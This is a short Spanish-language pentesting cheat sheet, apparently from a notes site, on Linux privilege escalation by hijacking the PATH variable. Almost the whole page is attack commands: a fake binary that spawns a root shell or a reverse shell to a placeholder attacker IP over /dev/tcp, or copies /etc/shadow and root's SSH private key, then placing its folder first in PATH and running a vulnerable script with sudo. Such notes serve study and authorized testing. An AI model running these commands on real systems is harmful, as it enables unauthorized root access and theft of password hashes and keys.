PATH Variable

Creación de directorio de trabajo.

cd ~
mkdir temp
cd temp

Creación de binario que suplantará el binario original y asignación de sus privilegios.

# opción 1: shell
echo "/bin/bash" > <binary>
echo "/bin/bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<port> 0>&1'" > <binary>
# opción 2: lectura de archivo
echo "/bin/bash -c 'cat /<path>/<file> > /home/<user>/temp/<file>'" > <binary>
echo "/bin/bash -c 'cat /etc/shadow > /home/<user>/temp/shadow'" > <binary>
echo "/bin/bash -c 'cat /root/.ssh/id_rsa > /home/<user>/temp/id_rsa'" > <binary>
# asignación de privilegios al binario
chmod 777 <binary>

Incorporación de ruta a variable PATH.

echo $PATH
export PATH=/home/<user>/temp:$PATH
echo $PATH

Ejecución de script o binario vulnerable.

sudo /<path>/<script>
sudo /<path>/<binary>

AnteriorHerramientas automatizadas SiguientePython Library Hijacking

Última actualización hace 1 año